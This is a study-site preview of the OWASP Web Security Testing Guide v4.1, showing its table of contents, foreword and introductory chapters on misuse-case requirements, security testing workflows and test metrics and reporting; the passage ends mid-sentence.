wstg-v4 1 - Gestão de Tecnologia da Informação (2024)

ESTÁCIO

Angelo 22/09/2024

wstg-v4 1 - Gestão de Tecnologia da Informação (3)

wstg-v4 1 - Gestão de Tecnologia da Informação (4)wstg-v4 1 - Gestão de Tecnologia da Informação (5)

Libere conteúdos
sem pagar

wstg-v4 1 - Gestão de Tecnologia da Informação (6)

wstg-v4 1 - Gestão de Tecnologia da Informação (7)wstg-v4 1 - Gestão de Tecnologia da Informação (8)

Acesse conteúdos dessa e de diversas outras disciplinas.

Libere conteúdos
sem pagar

wstg-v4 1 - Gestão de Tecnologia da Informação (9)

wstg-v4 1 - Gestão de Tecnologia da Informação (10)wstg-v4 1 - Gestão de Tecnologia da Informação (11)

Libere conteúdos
sem pagar

wstg-v4 1 - Gestão de Tecnologia da Informação (12)

wstg-v4 1 - Gestão de Tecnologia da Informação (13)wstg-v4 1 - Gestão de Tecnologia da Informação (14)

Acesse conteúdos dessa e de diversas outras disciplinas.

Libere conteúdos
sem pagar

wstg-v4 1 - Gestão de Tecnologia da Informação (15)

wstg-v4 1 - Gestão de Tecnologia da Informação (16)wstg-v4 1 - Gestão de Tecnologia da Informação (17)

Libere conteúdos
sem pagar

wstg-v4 1 - Gestão de Tecnologia da Informação (18)

wstg-v4 1 - Gestão de Tecnologia da Informação (19)wstg-v4 1 - Gestão de Tecnologia da Informação (20)

Acesse conteúdos dessa e de diversas outras disciplinas.

Libere conteúdos
sem pagar

wstg-v4 1 - Gestão de Tecnologia da Informação (21)

wstg-v4 1 - Gestão de Tecnologia da Informação (22)wstg-v4 1 - Gestão de Tecnologia da Informação (23)

Libere conteúdos
sem pagar

wstg-v4 1 - Gestão de Tecnologia da Informação (24)

wstg-v4 1 - Gestão de Tecnologia da Informação (25)wstg-v4 1 - Gestão de Tecnologia da Informação (26)

Acesse conteúdos dessa e de diversas outras disciplinas.

Libere conteúdos
sem pagar

wstg-v4 1 - Gestão de Tecnologia da Informação (27)

wstg-v4 1 - Gestão de Tecnologia da Informação (28)wstg-v4 1 - Gestão de Tecnologia da Informação (29)

Libere conteúdos
sem pagar

wstg-v4 1 - Gestão de Tecnologia da Informação (30)

wstg-v4 1 - Gestão de Tecnologia da Informação (31)wstg-v4 1 - Gestão de Tecnologia da Informação (32)

Acesse conteúdos dessa e de diversas outras disciplinas.

Libere conteúdos
sem pagar

Prévia do material em texto

<p>Web Security Testing Guide v4.1</p><p>1</p><p>Table of Contents</p><p>0. Foreword by Eoin Keary</p><p>1. Frontispiece</p><p>2. Introduction</p><p>2.1 The OWASP Testing Project</p><p>2.2 Principles of Testing</p><p>2.3 Testing Techniques Explained</p><p>2.4 Manual Inspections and Reviews</p><p>2.5 Threat Modeling</p><p>2.6 Source Code Review</p><p>2.7 Penetration Testing</p><p>2.8 The Need for a Balanced Approach</p><p>2.9 Deriving Security Test Requirements</p><p>2.10 Security Tests Integrated in Development and Testing Workflows</p><p>2.11 Security Test Data Analysis and Reporting</p><p>3. The OWASP Testing Framework</p><p>3.1 The Web Security Testing Framework</p><p>3.2 Phase 1 Before Development Begins</p><p>3.3 Phase 2 During Definition and Design</p><p>3.4 Phase 3 During Development</p><p>3.5 Phase 4 During Deployment</p><p>3.6 Phase 5 During Maintenance and Operations</p><p>3.7 A Typical SDLC Testing Workflow</p><p>3.8 Penetration Testing Methodologies</p><p>4. Web Application Security Testing</p><p>4.0 Introduction and Objectives</p><p>4.1 Information Gathering</p><p>4.1.1 Conduct Search Engine Discovery Reconnaissance for Information Leakage</p><p>4.1.2 Fingerprint Web Server</p><p>4.1.3 Review Webserver Metafiles for Information Leakage</p><p>4.1.4 Enumerate Applications on Webserver</p><p>4.1.5 Review Webpage Comments and Metadata for Information Leakage</p><p>4.1.6 Identify Application Entry Points</p><p>4.1.7 Map Execution Paths Through Application</p><p>4.1.8 Fingerprint Web Application Framework</p><p>4.1.9 Fingerprint Web Application</p><p>4.1.10 Map Application Architecture</p><p>4.2 Configuration and Deployment Management Testing</p><p>4.2.1 Test Network Infrastructure Configuration</p><p>4.2.2 Test Application Platform Configuration</p><p>4.2.3 Test File Extensions Handling for Sensitive Information</p><p>Web Security Testing Guide v4.1</p><p>2</p><p>4.2.4 Review Old Backup and Unreferenced Files for Sensitive Information</p><p>4.2.5 Enumerate Infrastructure and Application Admin Interfaces</p><p>4.2.6 Test HTTP Methods</p><p>4.2.7 Test HTTP Strict Transport Security</p><p>4.2.8 Test RIA Cross Domain Policy</p><p>4.2.9 Test File Permission</p><p>4.2.10 Test for Subdomain Takeover</p><p>4.2.11 Test Cloud Storage</p><p>4.3 Identity Management Testing</p><p>4.3.1 Test Role Definitions</p><p>4.3.2 Test User Registration Process</p><p>4.3.3 Test Account Provisioning Process</p><p>4.3.4 Testing for Account Enumeration and Guessable User Account</p><p>4.3.5 Testing for Weak or Unenforced Username Policy</p><p>4.4 Authentication Testing</p><p>4.4.1 Testing for Credentials Transported over an Encrypted Channel</p><p>4.4.2 Testing for Default Credentials</p><p>4.4.3 Testing for Weak Lock Out Mechanism</p><p>4.4.4 Testing for Bypassing Authentication Schema</p><p>4.4.5 Testing for Vulnerable Remember Password</p><p>4.4.6 Testing for Browser Cache Weaknesses</p><p>4.4.7 Testing for Weak Password Policy</p><p>4.4.8 Testing for Weak Security Question Answer</p><p>4.4.9 Testing for Weak Password Change or Reset Functionalities</p><p>4.4.10 Testing for Weaker Authentication in Alternative Channel</p><p>4.5 Authorization Testing</p><p>4.5.1 Testing Directory Traversal File Include</p><p>4.5.2 Testing for Bypassing Authorization Schema</p><p>4.5.3 Testing for Privilege Escalation</p><p>4.5.4 Testing for Insecure Direct Object References</p><p>4.6 Session Management Testing</p><p>4.6.1 Testing for Session Management Schema</p><p>4.6.2 Testing for Cookies Attributes</p><p>4.6.3 Testing for Session Fixation</p><p>4.6.4 Testing for Exposed Session Variables</p><p>4.6.5 Testing for Cross Site Request Forgery</p><p>4.6.6 Testing for Logout Functionality</p><p>4.6.7 Testing Session Timeout</p><p>4.6.8 Testing for Session Puzzling</p><p>4.7 Input Validation Testing</p><p>4.7.1 Testing for Reflected Cross Site Scripting</p><p>4.7.2 Testing for Stored Cross Site Scripting</p><p>4.7.3 Testing for HTTP Verb Tampering</p><p>4.7.4 Testing for HTTP Parameter Pollution</p><p>4.7.5 Testing for SQL Injection</p><p>4.7.5.1 Testing for Oracle</p><p>4.7.5.2 Testing for MySQL</p><p>4.7.5.3 Testing for SQL Server</p><p>4.7.5.4 Testing PostgreSQL</p><p>Web Security Testing Guide v4.1</p><p>3</p><p>4.7.5.5 Testing for MS Access</p><p>4.7.5.6 Testing for NoSQL Injection</p><p>4.7.5.7 Testing for ORM Injection</p><p>4.7.5.8 Testing for Client Side</p><p>4.7.6 Testing for LDAP Injection</p><p>4.7.7 Testing for XML Injection</p><p>4.7.8 Testing for SSI Injection</p><p>4.7.9 Testing for XPath Injection</p><p>4.7.10 Testing for IMAP SMTP Injection</p><p>4.7.11 Testing for Code Injection</p><p>4.7.11.1 Testing for Local File Inclusion</p><p>4.7.11.2 Testing for Remote File Inclusion</p><p>4.7.12 Testing for Command Injection</p><p>4.7.13 Testing for Buffer Overflow</p><p>4.7.13.1 Testing for Heap Overflow</p><p>4.7.13.2 Testing for Stack Overflow</p><p>4.7.13.3 Testing for Format String</p><p>4.7.14 Testing for Incubated Vulnerability</p><p>4.7.15 Testing for HTTP Splitting Smuggling</p><p>4.7.16 Testing for HTTP Incoming Requests</p><p>4.7.17 Testing for Host Header Injection</p><p>4.7.18 Testing for Server Side Template Injection</p><p>4.8 Testing for Error Handling</p><p>4.8.1 Testing for Error Code</p><p>4.8.2 Testing for Stack Traces</p><p>4.9 Testing for Weak Cryptography</p><p>4.9.1 Testing for Weak SSL TLS Ciphers Insufficient Transport Layer Protection</p><p>4.9.2 Testing for Padding Oracle</p><p>4.9.3 Testing for Sensitive Information Sent via Unencrypted Channels</p><p>4.9.4 Testing for Weak Encryption</p><p>4.10 Business Logic Testing</p><p>4.10.0 Introduction to Business Logic</p><p>4.10.1 Test Business Logic Data Validation</p><p>4.10.2 Test Ability to Forge Requests</p><p>4.10.3 Test Integrity Checks</p><p>4.10.4 Test for Process Timing</p><p>4.10.5 Test Number of Times a Function Can Be Used Limits</p><p>4.10.6 Testing for the Circumvention of Work Flows</p><p>4.10.7 Test Defenses Against Application Misuse</p><p>4.10.8 Test Upload of Unexpected File Types</p><p>4.10.9 Test Upload of Malicious Files</p><p>4.11 Client Side Testing</p><p>4.11.1 Testing for DOM-Based Cross Site Scripting</p><p>4.11.2 Testing for JavaScript Execution</p><p>4.11.3 Testing for HTML Injection</p><p>4.11.4 Testing for Client Side URL Redirect</p><p>4.11.5 Testing for CSS Injection</p><p>4.11.6 Testing for Client Side Resource Manipulation</p><p>4.11.7 Testing Cross Origin Resource Sharing</p><p>4.11.8 Testing for Cross Site Flashing</p><p>Web Security Testing Guide v4.1</p><p>4</p><p>4.11.9 Testing for Clickjacking</p><p>4.11.10 Testing WebSockets</p><p>4.11.11 Testing Web Messaging</p><p>4.11.12 Testing Browser Storage</p><p>4.11.13 Testing for Cross Site Script Inclusion</p><p>5. Reporting</p><p>Appendix A. Testing Tools Resource</p><p>Appendix B. Suggested Reading</p><p>Appendix C. Fuzz Vectors</p><p>Appendix D. Encoded Injection</p><p>Appendix E. History</p><p>Web Security Testing Guide v4.1</p><p>5</p><p>Foreword by Eoin Keary</p><p>The problem of insecure software is perhaps the most important technical challenge of our time. The dramatic rise of</p><p>web applications enabling business, social networking etc has only compounded the requirements to establish a</p><p>robust approach to writing and securing our Internet, Web Applications and Data.</p><p>At The Open Web Application Security Project (OWASP), we’re trying to make the world a place where insecure</p><p>software is the anomaly, not the norm. The OWASP Testing Guide has an important role to play in solving this serious</p><p>issue. It is vitally important that our approach to testing software for security issues is based on the principles of</p><p>engineering and science. We need a consistent, repeatable and defined approach to testing web applications. A world</p><p>without some minimal standards in terms of engineering and technology is a world in chaos.</p><p>It goes without saying that you can’t build a secure application without performing security testing on it. Testing is part of</p><p>a wider approach to building a secure system. Many software development organizations do not include security</p><p>testing as part of their standard software development process. What is even worse is that many security vendors</p><p>deliver testing with varying degrees of quality and rigor.</p><p>Security testing, by itself, isn’t a particularly good stand alone measure of how secure an application is, because there</p><p>are an infinite number of ways that an attacker might be able to make an application break, and it simply isn’t possible</p><p>to test them all. We can’t hack ourselves secure and we only have a limited time to test and defend where an attacker</p><p>does not have such constraints.</p><p>In conjunction with other OWASP projects such as the Code Review Guide, the Development Guide and tools such as</p><p>OWASP ZAP, this is a great start towards building</p><p>steps in a use scenario and thinking about how it can be maliciously exploited,</p><p>potential flaws or aspects of the application that are not well defined can be discovered. The key is to describe all</p><p>possible or, at least, the most critical use and misuse scenarios.</p><p>Misuse scenarios allow the analysis of the application from the attacker’s point of view and contribute to identifying</p><p>potential vulnerabilities and the countermeasures that need to be implemented to mitigate the impact caused by the</p><p>potential exposure to such vulnerabilities. Given all of the use and abuse cases, it is important to analyze them to</p><p>determine which are the most critical and need to be documented in security requirements. The identification of the</p><p>most critical misuse and abuse cases drives the documentation of security requirements and the necessary controls</p><p>where security risks should be mitigated.</p><p>To derive security requirements from both use and misuse cases, it is important to define the functional scenarios and</p><p>the negative scenarios and put these in graphical form. The following example is a step-by-step methodology for the</p><p>case of deriving security requirements for authentication.</p><p>Step 1: Describe the Functional Scenario</p><p>User authenticates by supplying a username and password. The application grants access to users based upon</p><p>authentication of user credentials by the application and provides specific errors to the user when validation fails.</p><p>Step 2: Describe the Negative Scenario</p><p>Attacker breaks the authentication through a brute force or dictionary attack of passwords and account harvesting</p><p>vulnerabilities in the application. The validation errors provide specific information to an attacker that is used to guess</p><p>which accounts are valid registered accounts (usernames). The attacker then attempts to brute force the password for a</p><p>valid account. A brute force attack on passwords with a minimum length of four digits can succeed with a limited</p><p>number of attempts (i.e., 10^4).</p><p>Step 3: Describe Functional and Negative Scenarios With Use and Misuse Case</p><p>The graphical example below depicts the derivation of security requirements via use and misuse cases. The functional</p><p>scenario consists of the user actions (entering a username and password) and the application actions (authenticating</p><p>the user and providing an error message if validation fails). The misuse case consists of the attacker actions, i.e. trying</p><p>to break authentication by brute forcing the password via a dictionary attack and by guessing the valid usernames from</p><p>error messages. By graphically representing the threats to the user actions (misuses), it is possible to derive the</p><p>countermeasures as the application actions that mitigate such threats.</p><p>https://folk.uio.no/nik/2001/21-sindre.pdf</p><p>https://iacis.org/iis/2006/Damodaran.pdf</p><p>Web Security Testing Guide v4.1</p><p>26</p><p>Figure 2-5: Use and Misuse Case</p><p>Step 4: Elicit The Security Requirements</p><p>In this case, the following security requirements for authentication are derived:</p><p>1. Passwords requirements must be aligned with the current standards for sufficient complexity.</p><p>2. Accounts must be to locked out after five unsuccessful log in attempts.</p><p>3. Log in error messages must be generic.</p><p>These security requirements need to be documented and tested.</p><p>Security Tests Integrated in Development and Testing Workflows</p><p>Security Testing in the Development Workflow</p><p>Web Security Testing Guide v4.1</p><p>27</p><p>Security testing during the development phase of the SDLC represents the first opportunity for developers to ensure</p><p>that the individual software components they have developed are security tested before they are integrated with other</p><p>components and built into the application. Software components might consist of software artifacts such as functions,</p><p>methods, and classes, as well as application programming interfaces, libraries, and executable files. For security</p><p>testing, developers can rely on the results of the source code analysis to verify statically that the developed source</p><p>code does not include potential vulnerabilities and is compliant with the secure coding standards. Security unit tests</p><p>can further verify dynamically (i.e., at run time) that the components function as expected. Before integrating both new</p><p>and existing code changes in the application build, the results of the static and dynamic analysis should be reviewed</p><p>and validated.</p><p>The validation of source code before integration in application builds is usually the responsibility of the senior</p><p>developer. Senior developers are also the subject matter experts in software security and their role is to lead the secure</p><p>code review. They must make decisions on whether to accept the code to be released in the application build, or to</p><p>require further changes and testing. This secure code review workflow can be enforced via formal acceptance, as well</p><p>as a check in a workflow management tool. For example, assuming the typical defect management workflow used for</p><p>functional bugs, security bugs that have been fixed by a developer can be reported on a defect or change management</p><p>system. The build master then can look at the test results reported by the developers in the tool, and grant approvals for</p><p>checking in the code changes into the application build.</p><p>Security Testing in the Test Workflow</p><p>After components and code changes are tested by developers and checked in to the application build, the most likely</p><p>next step in the software development process workflow is to perform tests on the application as a whole entity. This</p><p>level of testing is usually referred to as integrated test and system level test. When security tests are part of these testing</p><p>activities, they can be used to validate both the security functionality of the application as a whole, as well as the</p><p>exposure to application level vulnerabilities. These security tests on the application include both white-box testing,</p><p>such as source code analysis, and black-box testing, such as penetration testing. Tests can also include gray-box</p><p>testing, in which it is assumed that the tester has some partial knowledge about the application. For example, with</p><p>some knowledge about the session management of the application, the tester can better understand whether the log</p><p>out and timeout functions are properly secured.</p><p>The target for the security tests is the complete system that is vulnerable to attack. During this phase, it is possible for</p><p>security testers to determine whether vulnerabilities can be exploited. These include common web application</p><p>vulnerabilities, as well as security issues that have been identified earlier in the SDLC with other activities such as</p><p>threat modeling, source code analysis, and secure code reviews.</p><p>Usually, testing engineers, rather then software developers, perform security tests when the application is in scope for</p><p>integration system tests. Testing engineers have security knowledge of web application vulnerabilities, black-box and</p><p>white-box testing techniques, and own the validation of security requirements in this phase. In order to perform security</p><p>tests, it is a prerequisite that security test cases are documented in the security testing guidelines and procedures.</p><p>A testing engineer who validates the security of the application in the integrated system environment might release the</p><p>application for testing in the operational environment (e.g., user acceptance tests). At this stage of the SDLC (i.e.,</p><p>validation), the application’s functional testing is usually a responsibility of QA testers, while white-hat hackers or</p><p>security consultants are usually responsible for security testing. Some organizations rely on their own specialized</p><p>ethical hacking team to conduct such tests when a third party assessment is not required (such as for auditing</p><p>purposes).</p><p>Since these tests can sometimes be the last line of defense for fixing vulnerabilities before the application is released to</p><p>production, it is important that issues are addressed as recommended by the testing team. The recommendations</p><p>can</p><p>include code, design, or configuration change. At this level, security auditors and information security officers discuss</p><p>the reported security issues and analyze the potential risks according to information risk management procedures.</p><p>Such procedures might require the development team to fix all high risk vulnerabilities before the application can be</p><p>deployed, unless such risks are acknowledged and accepted.</p><p>Developer's Security Tests</p><p>Web Security Testing Guide v4.1</p><p>28</p><p>Security Testing in the Coding Phase: Unit Tests</p><p>From the developer’s perspective, the main objective of security tests is to validate that code is being developed in</p><p>compliance with secure coding standards requirements. Developers’ own coding artifacts (such as functions, methods,</p><p>classes, APIs, and libraries) need to be functionally validated before being integrated into the application build.</p><p>The security requirements that developers have to follow should be documented in secure coding standards and</p><p>validated with static and dynamic analysis. If the unit test activity follows a secure code review, unit tests can validate</p><p>that code changes required by secure code reviews are properly implemented. Both secure code reviews and source</p><p>code analysis through source code analysis tools can help developers in identifying security issues in source code as it</p><p>is developed. By using unit tests and dynamic analysis (e.g., debugging) developers can validate the security</p><p>functionality of components as well as verify that the countermeasures being developed mitigate any security risks</p><p>previously identified through threat modeling and source code analysis.</p><p>A good practice for developers is to build security test cases as a generic security test suite that is part of the existing</p><p>unit testing framework. A generic security test suite could be derived from previously defined use and misuse cases to</p><p>security test functions, methods and classes. A generic security test suite might include security test cases to validate</p><p>both positive and negative requirements for security controls such as:</p><p>Identity, authentication & access control</p><p>Input validation & encoding</p><p>Encryption</p><p>User and session management</p><p>Error and exception handling</p><p>Auditing and logging</p><p>Developers empowered with a source code analysis tool integrated into their IDE, secure coding standards, and a</p><p>security unit testing framework can assess and verify the security of the software components being developed.</p><p>Security test cases can be run to identify potential security issues that have root causes in source code: besides input</p><p>and output validation of parameters entering and exiting the components, these issues include authentication and</p><p>authorization checks done by the component, protection of the data within the component, secure exception and error</p><p>handling, and secure auditing and logging. Unit test frameworks such as JUnit, NUnit, and CUnit can be adapted to</p><p>verify security test requirements. In the case of security functional tests, unit level tests can test the functionality of</p><p>security controls at the software component level, such as functions, methods, or classes. For example, a test case</p><p>could validate input and output validation (e.g., variable sanitation) and boundary checks for variables by asserting the</p><p>expected functionality of the component.</p><p>The threat scenarios identified with use and misuse cases can be used to document the procedures for testing software</p><p>components. In the case of authentication components, for example, security unit tests can assert the functionality of</p><p>setting an account lockout as well as the fact that user input parameters cannot be abused to bypass the account</p><p>lockout (e.g., by setting the account lockout counter to a negative number).</p><p>At the component level, security unit tests can validate positive assertions as well as negative assertions, such as</p><p>errors and exception handling. Exceptions should be caught without leaving the system in an insecure state, such as</p><p>potential denial of service caused by resources not being de-allocated (e.g., connection handles not closed within a</p><p>final statement block), as well as potential elevation of privileges (e.g., higher privileges acquired before the exception</p><p>is thrown and not re-set to the previous level before exiting the function). Secure error handling can validate potential</p><p>information disclosure via informative error messages and stack traces.</p><p>Unit level security test cases can be developed by a security engineer who is the subject matter expert in software</p><p>security and is also responsible for validating that the security issues in the source code have been fixed and can be</p><p>checked in to the integrated system build. Typically, the manager of the application builds also makes sure that third-</p><p>party libraries and executable files are security assessed for potential vulnerabilities before being integrated in the</p><p>application build.</p><p>Web Security Testing Guide v4.1</p><p>29</p><p>Threat scenarios for common vulnerabilities that have root causes in insecure coding can also be documented in the</p><p>developer’s security testing guide. When a fix is implemented for a coding defect identified with source code analysis,</p><p>for example, security test cases can verify that the implementation of the code change follows the secure coding</p><p>requirements documented in the secure coding standards.</p><p>Source code analysis and unit tests can validate that the code change mitigates the vulnerability exposed by the</p><p>previously identified coding defect. The results of automated secure code analysis can also be used as automatic</p><p>check-in gates for version control, for example, software artifacts cannot be checked into the build with high or medium</p><p>severity coding issues.</p><p>Functional Testers' Security Tests</p><p>Security Testing During the Integration and Validation Phase: Integrated System Tests and Operation Tests</p><p>The main objective of integrated system tests is to validate the “defense in depth” concept, that is, that the</p><p>implementation of security controls provides security at different layers. For example, the lack of input validation when</p><p>calling a component integrated with the application is often a factor that can be tested with integration testing.</p><p>The integration system test environment is also the first environment where testers can simulate real attack scenarios</p><p>as can be potentially executed by a malicious external or internal user of the application. Security testing at this level</p><p>can validate whether vulnerabilities are real and can be exploited by attackers. For example, a potential vulnerability</p><p>found in source code can be rated as high risk because of the exposure to potential malicious users, as well as</p><p>because of the potential impact (e.g., access to confidential information).</p><p>Real attack scenarios can be tested with both manual testing techniques and penetration testing tools. Security tests of</p><p>this type are also referred to as ethical hacking tests. From the security testing perspective, these are risk-driven tests</p><p>and have the objective of testing the application in the operational environment. The target is the application build that</p><p>is representative of the version of the application being deployed into production.</p><p>Including security testing in the integration and validation phase is critical to identifying vulnerabilities due to integration</p><p>of components, as well as validating the exposure of such vulnerabilities. Application security testing requires a</p><p>specialized set of skills, including both software and security knowledge, that are not typical of security engineers. As a</p><p>result, organizations are often required to security-train their software developers on ethical hacking techniques, and</p><p>security assessment procedures and tools. A realistic scenario is to develop such resources in-house and document</p><p>them in security testing guides and procedures that take into account the developer’s security testing knowledge. A so</p><p>called “security test cases cheat list or checklist”, for example, can provide simple</p><p>test cases and attack vectors that can</p><p>be used by testers to validate exposure to common vulnerabilities such as spoofing, information disclosures, buffer</p><p>overflows, format strings, SQL injection and XSS injection, XML, SOAP, canonicalization issues, denial of service, and</p><p>managed code and ActiveX controls (e.g., .NET). A first battery of these tests can be performed manually with a very</p><p>basic knowledge of software security.</p><p>The first objective of security tests might be the validation of a set of minimum security requirements. These security test</p><p>cases might consist of manually forcing the application into error and exceptional states and gathering knowledge from</p><p>the application behavior. For example, SQL injection vulnerabilities can be tested manually by injecting attack vectors</p><p>through user input, and by checking if SQL exceptions are thrown back to the user. The evidence of a SQL exception</p><p>error might be a manifestation of a vulnerability that can be exploited.</p><p>A more in-depth security test might require the tester’s knowledge of specialized testing techniques and tools. Besides</p><p>source code analysis and penetration testing, these techniques include, for example: source code and binary fault</p><p>injection, fault propagation analysis and code coverage, fuzz testing, and reverse engineering. The security testing</p><p>guide should provide procedures and recommend tools that can be used by security testers to perform such in-depth</p><p>security assessments.</p><p>The next level of security testing after integration system tests is to perform security tests in the user acceptance</p><p>environment. There are unique advantages to performing security tests in the operational environment. The user</p><p>acceptance test (UAT) environment is the one that is most representative of the release configuration, with the</p><p>exception of the data (e.g., test data is used in place of real data). A characteristic of security testing in UAT is testing for</p><p>Web Security Testing Guide v4.1</p><p>30</p><p>security configuration issues. In some cases these vulnerabilities might represent high risks. For example, the server</p><p>that hosts the web application might not be configured with minimum privileges, valid SSL certificate and secure</p><p>configuration, essential services disabled, and web root directory cleaned of test and administration web pages.</p><p>Security Test Data Analysis and Reporting</p><p>Goals for Security Test Metrics and Measurements</p><p>Defining the goals for the security testing metrics and measurements is a prerequisite for using security testing data for</p><p>risk analysis and management processes. For example, a measurement, such as the total number of vulnerabilities</p><p>found with security tests, might quantify the security posture of the application. These measurements also help to</p><p>identify security objectives for software security testing, for example, reducing the number of vulnerabilities to an</p><p>acceptable minimum number before the application is deployed into production.</p><p>Another manageable goal could be to compare the application security posture against a baseline to assess</p><p>improvements in application security processes. For example, the security metrics baseline might consist of an</p><p>application that was tested only with penetration tests. The security data obtained from an application that was also</p><p>security tested during coding should show an improvement (e.g., fewer number of vulnerabilities) when compared with</p><p>the baseline.</p><p>In traditional software testing, the number of software defects, such as the bugs found in an application, could provide a</p><p>measure of software quality. Similarly, security testing can provide a measure of software security. From the defect</p><p>management and reporting perspective, software quality and security testing can use similar categorizations for root</p><p>causes and defect remediation efforts. From the root cause perspective, a security defect can be due to an error in</p><p>design (e.g., security flaws) or due to an error in coding (e.g., security bug). From the perspective of the effort required</p><p>to fix a defect, both security and quality defects can be measured in terms of developer hours to implement the fix, the</p><p>tools and resources required, and the cost to implement the fix.</p><p>A characteristic of security test data, compared to quality data, is the categorization in terms of the threat, the exposure</p><p>of the vulnerability, and the potential impact posed by the vulnerability to determine the risk. Testing applications for</p><p>security consists of managing technical risks to make sure that the application countermeasures meet acceptable</p><p>levels. For this reason, security testing data needs to support the security risk strategy at critical checkpoints during the</p><p>SDLC. For example, vulnerabilities found in source code with source code analysis represent an initial measure of risk.</p><p>A measure of risk (e.g., high, medium, low) for the vulnerability can be calculated by determining the exposure and</p><p>likelihood factors, and by validating the vulnerability with penetration tests. The risk metrics associated to vulnerabilities</p><p>found with security tests empower business management to make risk management decisions, such as to decide</p><p>whether risks can be accepted, mitigated, or transferred at different levels within the organization (e.g., business as well</p><p>as technical risks).</p><p>When evaluating the security posture of an application, it is important to take into consideration certain factors, such as</p><p>the size of the application being developed. Application size has been statistically proven to be related to the number of</p><p>issues found in the application during testing. Since testing reduces issues, it is logical for larger size applications to be</p><p>tested more often than smaller size applications.</p><p>When security testing is done in several phases of the SDLC, the test data can prove the capability of the security tests</p><p>in detecting vulnerabilities as soon as they are introduced. The test data can also prove the effectiveness of removing</p><p>the vulnerabilities by implementing countermeasures at different checkpoints of the SDLC. A measurement of this type</p><p>is also defined as “containment metrics” and provides a measure of the ability of a security assessment performed at</p><p>each phase of the development process to maintain security within each phase. These containment metrics are also a</p><p>critical factor in lowering the cost of fixing the vulnerabilities. It is less expensive to deal with vulnerabilities in the same</p><p>phase of the SDLC that they are found, rather then fixing them later in another phase.</p><p>Security test metrics can support security risk, cost, and defect management analysis when they are associated with</p><p>tangible and timed goals such as:</p><p>Reducing the overall number of vulnerabilities by 30%.</p><p>Fixing security issues by a certain deadline (e.g., before beta release).</p><p>Web Security Testing Guide v4.1</p><p>31</p><p>Security test data can be absolute, such as the number of vulnerabilities detected during manual code review, as well</p><p>as comparative, such as the number of vulnerabilities detected in code reviews compared to penetration tests. To</p><p>answer questions about the quality of the security process, it is important to determine a baseline for what could be</p><p>considered acceptable and good.</p><p>Security test data can also support specific objectives of the security analysis. These objectives could be compliance</p><p>with security regulations and information security standards, management of security processes, the identification of</p><p>security root causes and process improvements, and security cost benefit analysis.</p><p>When security test data is reported, it has to provide metrics to support the analysis. The scope of the analysis is the</p><p>interpretation of test data to find clues about the security of the software being produced, as well as the effectiveness of</p><p>the process.</p><p>Some examples of clues supported by security test data can be:</p><p>Are vulnerabilities reduced to an acceptable level for release?</p><p>How does the security quality of this product compare with similar software products?</p><p>Are all security test requirements being met?</p><p>What are the major root causes of security issues?</p><p>How numerous are security flaws compared to security bugs?</p><p>Which security activity is most effective in finding vulnerabilities?</p><p>Which team is more productive in fixing security defects and vulnerabilities?</p><p>What percentage of overall vulnerabilities are high risk?</p><p>Which tools are most effective in detecting security vulnerabilities?</p><p>What kind of security tests are most effective in finding vulnerabilities (e.g., white-box vs. black-box) tests?</p><p>How many security issues are found during secure code reviews?</p><p>How many security issues are found during secure design reviews?</p><p>In order to make a sound judgment using the testing data, it is important to have a good understanding of the testing</p><p>process as well as the testing tools. A tool taxonomy should be adopted to decide which security tools to use. Security</p><p>tools can be qualified as being good at finding common, known vulnerabilities, when targeting different artifacts.</p><p>It is important to note that unknown security issues are not tested. The fact that a security test is clear of issues does not</p><p>mean that the software or application is good.</p><p>Even the most sophisticated automation tools are not a match for an experienced security tester. Just relying on</p><p>successful test results from automated tools will give security practitioners a false sense of security. Typically, the more</p><p>experienced the security testers are with the security testing methodology and testing tools, the better the results of the</p><p>security test and analysis will be. It is important that managers making an investment in security testing tools also</p><p>consider an investment in hiring skilled human resources, as well as security test training.</p><p>Reporting Requirements</p><p>The security posture of an application can be characterized from the perspective of the effect, such as number of</p><p>vulnerabilities and the risk rating of the vulnerabilities, as well as from the perspective of the cause or origin, such as</p><p>coding errors, architectural flaws, and configuration issues.</p><p>Vulnerabilities can be classified according to different criteria. The most commonly used vulnerability severity metric is</p><p>the Common Vulnerability Scoring System (CVSS), a standard maintained by the Forum of Incident Response and</p><p>Security Teams (FIRST).</p><p>When reporting security test data, the best practice is to include the following information:</p><p>a categorization of each vulnerability by type;</p><p>the security threat that each issue is exposed to;</p><p>https://www.first.org/cvss/</p><p>Web Security Testing Guide v4.1</p><p>32</p><p>the root cause of each security issue, such as the bug or flaw;</p><p>each testing technique used to find the issues;</p><p>the remediation, or countermeasure, for each vulnerability; and</p><p>the severity rating of each vulnerability (e.g., high, medium, low, or CVSS score).</p><p>By describing what the security threat is, it will be possible to understand if and why the mitigation control is ineffective</p><p>in mitigating the threat.</p><p>Reporting the root cause of the issue can help pinpoint what needs to be fixed. In the case of white-box testing, for</p><p>example, the software security root cause of the vulnerability will be the offending source code.</p><p>Once issues are reported, it is also important to provide guidance to the software developer on how to re-test and find</p><p>the vulnerability. This might involve using a white-box testing technique (e.g., security code review with a static code</p><p>analyzer) to find if the code is vulnerable. If a vulnerability can be found via a black-box penetration test, the test report</p><p>also needs to provide information on how to validate the exposure of the vulnerability to the front end (e.g., client).</p><p>The information about how to fix the vulnerability should be detailed enough for a developer to implement a fix. It</p><p>should provide secure coding examples, configuration changes, and provide adequate references.</p><p>Finally, the severity rating contributes to the calculation of risk rating and helps to prioritize the remediation effort.</p><p>Typically, assigning a risk rating to the vulnerability involves external risk analysis based upon factors such as impact</p><p>and exposure.</p><p>Business Cases</p><p>For the security test metrics to be useful, they need to provide value back to the organization’s security test data</p><p>stakeholders. The stakeholders can include project managers, developers, information security offices, auditors, and</p><p>chief information officers. The value can be in terms of the business case that each project stakeholder has, in terms of</p><p>role and responsibility.</p><p>Software developers look at security test data to show that software is coded securely and efficiently. This allows them</p><p>to make the case for using source code analysis tools, following secure coding standards, and attending software</p><p>security training.</p><p>Project managers look for data that allows them to successfully manage and utilize security testing activities and</p><p>resources according to the project plan. To project managers, security test data can show that projects are on schedule</p><p>and moving on target for delivery dates, and are getting better during tests.</p><p>Security test data also helps the business case for security testing if the initiative comes from information security</p><p>officers (ISOs). For example, it can provide evidence that security testing during the SDLC does not impact the project</p><p>delivery, but rather reduces the overall workload needed to address vulnerabilities later in production.</p><p>To compliance auditors, security test metrics provide a level of software security assurance and confidence that security</p><p>standard compliance is addressed through the security review processes within the organization.</p><p>Finally, Chief Information Officers (CIOs), and Chief Information Security Officers (CISOs), who are responsible for the</p><p>budget that needs to be allocated in security resources, look for derivation of a cost-benefit analysis from security test</p><p>data. This allows them to make informed decisions about which security activities and tools to invest 